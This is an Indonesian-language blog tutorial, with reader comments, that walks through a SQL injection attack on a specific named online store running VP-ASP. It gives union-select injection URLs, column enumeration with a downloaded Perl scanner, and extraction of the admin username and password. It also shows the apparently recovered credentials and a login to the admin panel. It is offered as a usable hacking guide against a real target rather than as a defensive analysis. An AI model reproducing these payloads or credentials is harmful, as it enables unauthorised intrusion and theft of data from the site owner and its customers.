By Irvian
Published: June 23, 2007
Print
Email
Masuk Ke Shopadmin Lewat Bug Sql Injection Pada Database Microsoft Access Buka url berikut : http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1’
Inject : http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select %201%20from%20users" 
Error di atas artinya adalah tabel users tidak ada dalam database mari kita coba ganti dengan tabel yang lain. http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select %201%20from%20tbluser"

Error di atas artinya kita sudah menemukan nama tabel.
Langkah selajutnya Anda dapat mencoba menambah angka 1,2,3,4 dst sampai request browser tidak error Contoh : http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select %201,2%20from%20tbluser"
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select %201,2,3%20from%20tbluser"
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=7%20union%20select %201,2,3,4%20from%20tbluser"
dst sampai request browser tidak error.
Jika anda berfikir itu melelahkan maka kita lanjutkan turotrial ini ☺
Pertama – tama install perl di Windows anda.
Dapat di download di http://www.perl.com
 Setelah installasi selesai di lakukan kita ambil source scanner jumlah kolom yang saya buat dengan bahasa perl di http://fenomena.info/jet.txt . 
Kemudian simpan di dalam directory windows anda misal c:\ lihat pada gambar di bawah ini. 
alankan Command Prompt, Kemudian ketik perl nama file.txt lihat pada gambar 
Ketik command berikut di Command Prompt perl jet.txt http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1 tbluser
Dimana : jet.txt adalah nama source http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1 adalah url target tbluser adalah nama tabel 
Tunggu sebentar hingga program menemukan jumlah kolom lihat gambar. 
Setelah sucses buka file irv.txt yang berada di dalam c:\ 
Copy lalu paste url yang ada dalam irv.txt ke dalam browser kamu 
Ganti angka 3 dan 4 dengan fldusername dan fldpassword.
Mungkin anda bertanya :
Mengapa harus diganti dengan fldusername dan fldpassword ?
Good questions, Yang kita eksploritasi di sini adalah vp-asp shoppingcart dimana di dalam tabel tbluser pada vp-asp terdapat kolom fldusername dan fldpassword disamping kolom - kolom yang lain. Disini saya hanya mengeluarkan info ke 2 kolom tersebut karena ke 2 kolom tersebut berisi data username dan password.
Mengapa harus angka 3 dan 4 kenapa tidak 5 dan 6 atau 2 dan 21?
Nice questions, Di dalam gambar di bawah ini dapat kita lihat ada 4 angka yang di lingkari merah yaitu 3, 4,22, dan 18. angka - angka tersebut adalah tempat kita menganti dengan nama kolom fldusername dan fldpassword. Jadi fldusername dan password dapat dimasukan di angka 2 dan 3 atau 22 dan 18.

Sehingga jika angka 2 dan 3 diganti dengan fldusername dan fldpassword maka urlnya menjadi:
http://www.recgroup.ca/store/shopdisplayproducts.asp?id=1%20union%20select %201,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20tbluser%22

Ditahap ini kita sudah menemukan username recgroup dan password rec123 Saatnya kita coba tes login ke
http://www.recgroup.ca/store/shopadmin.asp
 Ups ternyata masuk. 
Kini anda susah didalam Created by irvian. Mohon maaf jika terjadi kesalahan penulisan pada artikel ini Semoga berguna!!
View Comments (3)
|
Thank Atas artikelnya Bro
thank..
tapi http://fenomena.info/jet.txt sudah mati kira2 dimana bisa mendapatkan source perl scanner...
ditunggu bantuanya..
fenomena.info/jet.txt iya neh ndak bisa di buka... bisa di ambil di mana neh mas Irvian ?
kirim ke email ku donk mas plss... stompul@yahoo.com
thanks mas